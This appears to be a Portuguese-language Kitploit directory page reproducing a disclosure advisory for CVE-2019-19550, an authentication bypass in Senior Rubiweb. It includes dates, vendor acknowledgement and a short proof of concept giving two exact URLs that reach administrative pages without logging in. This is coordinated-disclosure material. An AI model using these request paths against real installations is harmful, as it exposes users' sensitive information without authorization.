Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-19550 — Exploit de prova de conceito para CVE-2019-19550, uma bypass de autenticação remota no Senior Rubiweb 6.2.34.28/37, permitindo acesso administrativo não autorizado a informações sensíveis via URLs manipuladas. | Kitploit
Ferramentas/GitHubGitHub/underprotection/cve-2019-19550
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubunderprotection/cve-2019-19550

CVE-2019-19550

Exploit de prova de conceito para CVE-2019-19550, uma bypass de autenticação remota no Senior Rubiweb 6.2.34.28/37, permitindo acesso administrativo não autorizado a informações sensíveis via URLs manipuladas.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 6 anosAinda não revisado

CVE-2019-19550


[Descrição]

Contorno de Autenticação Remota no Senior Rubiweb 6.2.34.28 e 6.2.34.37 permite acesso de administrador a informações sensíveis de usuários afetados usando versões vulneráveis. O atacante só precisa fornecer a URL correta.


[Datas Importantes]

  • Anúncio (ao Fornecedor): 2019-12-02
  • Data de divulgação pública: 2020-01-30

[Tipo de Vulnerabilidade]

Controle de Acesso Incorreto


[Fornecedor do Produto]

Senior


[Base de Código do Produto Afetado]

  • Rubiweb - 6.2.34.37
  • Rubiweb - 6.2.34.28
  • Outras versões podem ser afetadas, especialmente na mesma família (ainda não testadas)

[Componente Afetado]

Rubiweb


[Tipo de Ataque]

Remoto


[Impacto de Divulgação de Informações]

Verdadeiro


[Vetores de Ataque]

O acesso a informações sensíveis está disponível publicamente sem requisitos especiais (apenas a URI correta)


[O fornecedor confirmou ou reconheceu a vulnerabilidade?]

Verdadeiro


[PoC - Prova de Conceito]

  1. Simplesmente tente conectar ao portal autenticado para confirmar a existência e versão do produto afetado:
    • hXXp://subdomain.customer.tld:8080/rubiweb/
  2. Acesse a página vulnerável (admin sem autenticação):
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU

[Descobridor]

Mauricio Santos (P&D UnderProtection) e Hesron Hori (P&D UnderProtection)


[Agradecimentos]

Senior - Equipe de Segurança da Informação do Fornecedor que colaborou para uma divulgação coordenada


[Referência]

  • https://www.underprotection.com.br
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm#central-de-configuracao/CfgWebApplicationsForm.htm%23CfgWebApplicationsForm_edtUserName
Baixar ferramenta